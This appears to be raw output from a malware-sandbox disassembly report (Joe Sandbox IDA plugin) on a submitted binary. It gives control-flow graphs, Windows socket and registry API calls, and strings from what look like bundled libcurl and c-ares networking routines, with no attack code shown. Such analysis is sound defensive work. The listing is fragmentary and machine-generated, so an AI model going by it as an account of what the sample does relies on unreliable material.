                                                          control_flow_graph 1272 8529ff-852a2f FindFirstFileA 1273 852a31-852a36 1272->1273 1274 852a38 1272->1274 1275 852a3d-852a91 call c8f8d0 call c8f960 RegOpenKeyExA 1273->1275 1274->1275 1280 852a93-852a98 1275->1280 1281 852a9a 1275->1281 1282 852a9f-852b0c call c8f8d0 call c8f960 CharUpperA call bd8da0 1280->1282 1281->1282 1290 852b15 1282->1290 1291 852b0e-852b13 1282->1291 1292 852b1a-852b92 call c8f8d0 call c8f960 call bd8e80 call bd8e70 1290->1292 1291->1292 1301 852b94-852ba3 1292->1301 1302 852bcc-852c66 QueryFullProcessImageNameA CloseHandle call bd8da0 1292->1302 1305 852ba5-852bae 1301->1305 1306 852bb0-852bc0 call bd8e68 1301->1306 1312 852c6f 1302->1312 1313 852c68-852c6d 1302->1313 1305->1302 1310 852bc5-852bca 1306->1310 1310->1301 1310->1302 1314 852c74-852ce9 call c8f8d0 call c8f960 call bd8e80 call bd8e70 1312->1314 1313->1314 1323 852dcf-852e1c call c8f8d0 call c8f960 CloseHandle 1314->1323 1324 852cef-852d49 call bd8bb0 call bd8da0 1314->1324 1334 852e23-852e2e 1323->1334 1335 852d99-852dad 1324->1335 1336 852d4b-852d63 call bd8da0 1324->1336 1337 852e37 1334->1337 1338 852e30-852e35 1334->1338 1335->1323 1336->1335 1345 852d65-852d7d call bd8da0 1336->1345 1339 852e3c-852ed6 call c8f8d0 call c8f960 1337->1339 1338->1339 1354 852ed8-852ee1 1339->1354 1355 852eea 1339->1355 1345->1335 1350 852d7f-852d97 call bd8da0 1345->1350 1350->1335 1356 852daf-852dc9 call bd8e68 1350->1356 1354->1355 1357 852ee3-852ee8 1354->1357 1358 852eef-852f16 call c8f8d0 call c8f960 1355->1358 1356->1323 1356->1324 1357->1358
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: 42fde8f8f91e52331f45dddc37b1c1b030e6ff859b2d3dfd8bebba20f9402010
                                                          • Instruction ID: b1b5c53f1389f231e642a419ab8ab347dc5bb1fbb2016ac360e70273263e3f6e
                                                          • Opcode Fuzzy Hash: 42fde8f8f91e52331f45dddc37b1c1b030e6ff859b2d3dfd8bebba20f9402010
                                                          • Instruction Fuzzy Hash: 10E1D8B09083099FCB10EF68D98579DBBF4EF45355F4088AAE888D7351EB74DA488F52
                                                          Function 008605B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1545 8605b0-8605b7 1546 8607ee 1545->1546 1547 8605bd-8605d4 1545->1547 1548 8607e7-8607ed 1547->1548 1549 8605da-8605e6 1547->1549 1548->1546 1549->1548 1550 8605ec-8605f0 1549->1550 1551 8605f6-860620 call 867350 call 8570b0 1550->1551 1552 8607c7-8607cc 1550->1552 1557 860622-860624 1551->1557 1558 86066a-86068c call 88dec0 1551->1558 1552->1548 1560 860630-860655 call 8570d0 call 8603c0 call 867450 1557->1560 1564 8607d6-8607e3 call 867380 1558->1564 1565 860692-8606a0 1558->1565 1585 8607ce 1560->1585 1586 86065b-860668 call 8570e0 1560->1586 1564->1548 1568 8606f4-8606f6 1565->1568 1569 8606a2-8606a4 1565->1569 1571 8607ef-86082b call 863000 1568->1571 1572 8606fc-8606fe 1568->1572 1574 8606b0-8606e4 call 8673b0 1569->1574 1589 860831-860837 1571->1589 1590 860a2f-860a35 1571->1590 1576 86072c-860754 1572->1576 1574->1564 1584 8606ea-8606ee 1574->1584 1581 860756-86075b 1576->1581 1582 86075f-86078b 1576->1582 1587 860707-860719 WSAEventSelect 1581->1587 1588 86075d 1581->1588 1602 860700-860703 1582->1602 1603 860791-860796 1582->1603 1584->1574 1591 8606f0 1584->1591 1585->1564 1586->1558 1586->1560 1587->1564 1595 86071f 1587->1595 1596 860723-860726 1588->1596 1598 860861-86087e 1589->1598 1599 860839-86084c call 866fa0 1589->1599 1592 860a37-860a3a 1590->1592 1593 860a3c-860a52 1590->1593 1591->1568 1592->1593 1593->1564 1600 860a58-860a81 call 862f10 1593->1600 1595->1596 1596->1571 1596->1576 1612 860882-86088d 1598->1612 1610 860852 1599->1610 1611 860a9c-860aa4 1599->1611 1600->1564 1618 860a87-860a97 call 866df0 1600->1618 1602->1587 1603->1602 1605 86079c-8607c2 call 8576a0 1603->1605 1605->1602 1610->1598 1615 860854-86085f 1610->1615 1611->1564 1616 860893-8608b1 1612->1616 1617 860970-860975 1612->1617 1615->1612 1621 8608c8-8608f7 1616->1621 1619 86097b-860989 call 8570b0 1617->1619 1620 860a19-860a2c 1617->1620 1618->1564 1619->1620 1628 86098f-86099e 1619->1628 1620->1590 1629 8608fd-860925 1621->1629 1630 8608f9-8608fb 1621->1630 1631 8609b0-8609c1 call 8570d0 1628->1631 1632 860928-86093f 1629->1632 1630->1632 1638 8609c3-8609c7 1631->1638 1639 8609a0-8609ae call 8570e0 1631->1639 1636 860945-86096b 1632->1636 1637 8608b3-8608c2 1632->1637 1636->1637 1637->1617 1637->1621 1641 8609e8-860a03 WSAEnumNetworkEvents 1638->1641 1639->1620 1639->1631 1642 860a05-860a17 1641->1642 1643 8609d0-8609e6 WSAEventSelect 1641->1643 1642->1643 1643->1639 1643->1641
                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00860712
                                                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008609DC
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008609FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: multi.c
                                                          • API String ID: 2170980988-214371023
                                                          • Opcode ID: b1c5e3471163edf1ab33158104fb6558bb0d4c90d8bc2418e17ad1a42f3c6a36
                                                          • Instruction ID: 091ca08e698a88c6626f2ab1239adfded2271b52861a6709d600c116b19f64ef
                                                          • Opcode Fuzzy Hash: b1c5e3471163edf1ab33158104fb6558bb0d4c90d8bc2418e17ad1a42f3c6a36
                                                          • Instruction Fuzzy Hash: B6D1BC716083059BE710CF64C881B6BBBE9FF94348F05882CF885C6292E775E949CF96
                                                          Function 00866FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1682 866fa0-866fd2 1683 866fd4-866fd6 1682->1683 1684 866feb-866ff1 1682->1684 1685 866fe0-866fe4 1683->1685 1686 866ff7-866ff9 1684->1686 1687 867324-867330 1684->1687 1688 866fe6-866fe9 1685->1688 1689 86701b-867041 1685->1689 1690 867186-867196 1686->1690 1691 866fff-867016 1686->1691 1688->1684 1688->1685 1692 867060-867074 1689->1692 1690->1687 1691->1687 1694 867076-867081 1692->1694 1695 867057-86705a 1692->1695 1694->1695 1698 867083-867089 1694->1698 1695->1692 1697 867172-867174 1695->1697 1701 867176-867184 1697->1701 1702 86719b-8671a8 1697->1702 1699 8670dc-8670df 1698->1699 1700 86708b-86708f 1698->1700 1707 8670e1-8670e5 1699->1707 1708 86712c-867132 1699->1708 1705 8670b0-8670bd 1700->1705 1706 867091 1700->1706 1703 8671f1-86722d call 86d7f0 select 1701->1703 1702->1703 1704 8671aa-8671be 1702->1704 1732 867233-86723e 1703->1732 1733 86730b 1703->1733 1709 8671c4-8671c6 1704->1709 1710 86730d-867310 1704->1710 1714 8670d5 1705->1714 1715 8670bf-8670ce 1705->1715 1711 8670a0-8670a7 1706->1711 1716 8670e7 1707->1716 1717 867100-86710d 1707->1717 1708->1695 1712 867138-86713c 1708->1712 1720 867331-867344 1709->1720 1721 8671cc-8671e6 1709->1721 1710->1687 1726 867312-867322 1710->1726 1711->1705 1722 8670a9-8670ac 1711->1722 1723 86713e 1712->1723 1724 86714d-86715a 1712->1724 1714->1699 1715->1714 1727 8670f0-8670f7 1716->1727 1718 867125 1717->1718 1719 86710f-86711e 1717->1719 1718->1708 1719->1718 1720->1687 1743 867346 1720->1743 1721->1687 1744 8671ec 1721->1744 1722->1711 1728 8670ae 1722->1728 1729 867140-867144 1723->1729 1730 867050 1724->1730 1731 867160-86716d 1724->1731 1726->1687 1727->1717 1734 8670f9-8670fc 1727->1734 1728->1705 1729->1724 1738 867146-867149 1729->1738 1730->1695 1731->1730 1739 86725c-867269 1732->1739 1733->1710 1734->1727 1735 8670fe 1734->1735 1735->1717 1738->1729 1745 86714b 1738->1745 1741 867253-867256 1739->1741 1742 86726b-86727b __WSAFDIsSet 1739->1742 1741->1687 1741->1739 1746 86727d-867287 1742->1746 1747 86729a-8672ac __WSAFDIsSet 1742->1747 1743->1726 1744->1726 1745->1724 1748 86728e-867293 1746->1748 1749 867289 1746->1749 1750 8672ae-8672b3 1747->1750 1751 8672ba-8672c9 __WSAFDIsSet 1747->1751 1748->1747 1752 867295 1748->1752 1749->1748 1750->1751 1753 8672b5 1750->1753 1754 867240 1751->1754 1755 8672cf-8672f6 1751->1755 1752->1747 1753->1751 1756 867245-86724c 1754->1756 1755->1756 1757 8672fc-867306 1755->1757 1756->1741 1757->1756
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b626141e757b104d7f28810fedd60218a17afdf85b7d030599c2047b39df23d
                                                          • Instruction ID: 2474563d96ee1aedfeda241bff5365bdb7b2f27bb67a40b5ff3742dc323f9eac
                                                          • Opcode Fuzzy Hash: 9b626141e757b104d7f28810fedd60218a17afdf85b7d030599c2047b39df23d
                                                          • Instruction Fuzzy Hash: 8D91F53060C7498BD7358A28C9907BBB2D5FFC5328F168B2CE8A9C72D4EB759C4196D1
                                                          Function 0091B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1758 91b180-91b195 1759 91b3e0-91b3e7 1758->1759 1760 91b19b-91b1a2 1758->1760 1761 91b1b0-91b1b9 1760->1761 1761->1761 1762 91b1bb-91b1bd 1761->1762 1762->1759 1763 91b1c3-91b1d0 1762->1763 1765 91b1d6-91b1f2 1763->1765 1766 91b3db 1763->1766 1767 91b229-91b22d 1765->1767 1766->1759 1768 91b233-91b246 1767->1768 1769 91b3e8-91b417 1767->1769 1770 91b260-91b264 1768->1770 1771 91b248-91b24b 1768->1771 1777 91b582-91b589 1769->1777 1778 91b41d-91b429 1769->1778 1775 91b269-91b286 call 91af30 1770->1775 1772 91b215-91b223 1771->1772 1773 91b24d-91b256 1771->1773 1772->1767 1776 91b315-91b33c call bd8b00 1772->1776 1773->1775 1786 91b2f0-91b301 1775->1786 1787 91b288-91b2a3 call 91b060 1775->1787 1789 91b342-91b347 1776->1789 1790 91b3bf-91b3ca 1776->1790 1781 91b435-91b44c call 91b590 1778->1781 1782 91b42b-91b433 call 91b590 1778->1782 1799 91b458-91b471 call 91b590 1781->1799 1800 91b44e-91b456 call 91b590 1781->1800 1782->1781 1786->1772 1803 91b307-91b310 1786->1803 1806 91b200-91b213 call 91b020 1787->1806 1807 91b2a9-91b2c7 getsockname call 91b020 1787->1807 1796 91b384-91b38f 1789->1796 1797 91b349-91b358 1789->1797 1794 91b3cc-91b3d9 1790->1794 1794->1759 1796->1790 1805 91b391-91b3a5 1796->1805 1804 91b360-91b382 1797->1804 1816 91b473-91b487 1799->1816 1817 91b48c-91b4a7 1799->1817 1800->1799 1803->1794 1804->1796 1804->1804 1812 91b3b0-91b3bd 1805->1812 1806->1772 1814 91b2cc-91b2dd 1807->1814 1812->1790 1812->1812 1814->1772 1818 91b2e3 1814->1818 1816->1777 1819 91b4b3-91b4cb call 91b660 1817->1819 1820 91b4a9-91b4b1 call 91b660 1817->1820 1818->1803 1825 91b4d9-91b4f5 call 91b660 1819->1825 1826 91b4cd-91b4d5 call 91b660 1819->1826 1820->1819 1831 91b4f7-91b50b 1825->1831 1832 91b50d-91b52b call 91b770 * 2 1825->1832 1826->1825 1831->1777 1832->1777 1837 91b52d-91b531 1832->1837 1838 91b580 1837->1838 1839 91b533-91b53b 1837->1839 1838->1777 1840 91b578-91b57e 1839->1840 1841 91b53d-91b547 1839->1841 1840->1777 1841->1840 1842 91b549-91b54d 1841->1842 1842->1840 1843 91b54f-91b558 1842->1843 1843->1840 1844 91b55a-91b576 call 91b870 * 2 1843->1844 1844->1777 1844->1840
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0091B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-2430778319
                                                          • Opcode ID: dc4d244ed59503299e7d6cc0bddb86b80d786204e4b44e63b23ba0a9b54a8b35
                                                          • Instruction ID: 1a5fcc9a55d1cb0b8ff12bae10b79689ececb867c5f216a72a808076f5fee671
                                                          • Opcode Fuzzy Hash: dc4d244ed59503299e7d6cc0bddb86b80d786204e4b44e63b23ba0a9b54a8b35
                                                          • Instruction Fuzzy Hash: 84C17E717053099FD718DF24C880AAAB7E6AF88354F44886CF8598B3A2D735ED85CB81
                                                          Function 0091A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0090712E,?,?,?,00001001,00000000), ref: 0091A90D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: c61ad75391d20542b76e202e59071af05c7307add486d09658713c91a59c460c
                                                          • Instruction ID: 276e74cb6bfdea78cd16406fd3e8cc74145fdde7e56b540eabd0324912410691
                                                          • Opcode Fuzzy Hash: c61ad75391d20542b76e202e59071af05c7307add486d09658713c91a59c460c
                                                          • Instruction Fuzzy Hash: 5DF06D7521930CAFD2109E01DC44DABBBEDEFC9764F05495DF948132118270AE50CAB2
                                                          Function 0090A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0090AA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0090AA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0090AA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0090AAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0090AB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 0090AB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0090AB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0090AC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0090AD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 0090AD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 0090ADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 0090AE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0090AE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0090AE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0090AF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0090AFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0090B072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$CloseEnum
                                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                          • API String ID: 4217438148-1047472027
                                                          • Opcode ID: 897858b1421e0f24f1cdc31181e8618e8ed0e26fa8646940168f0b6be917a4b2
                                                          • Instruction ID: 03aa136a05f1b81e01635bfbf290c38637a069f4fbfa2cfc68e52fe69f7b7292
                                                          • Opcode Fuzzy Hash: 897858b1421e0f24f1cdc31181e8618e8ed0e26fa8646940168f0b6be917a4b2
                                                          • Instruction Fuzzy Hash: C4729FB1604301AFE7209B25CC85B6BBBE8AF85740F14482DF985DB2E1E775E944CB93
                                                          Function 0088A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0088A832
                                                          Strings
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 0088AE60
                                                          • Could not set TCP_NODELAY: %s, xrefs: 0088A871
                                                          • Trying [%s]:%d..., xrefs: 0088A689
                                                          • cf-socket.c, xrefs: 0088A5CD, 0088A735
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0088A6CE
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0088ADAC
                                                          • @, xrefs: 0088A8F4
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0088AD0A
                                                          • Bind to local port %d failed, trying next, xrefs: 0088AFE5
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0088AE1F
                                                          • Local port: %hu, xrefs: 0088AF28
                                                          • @, xrefs: 0088AC42
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0088A796
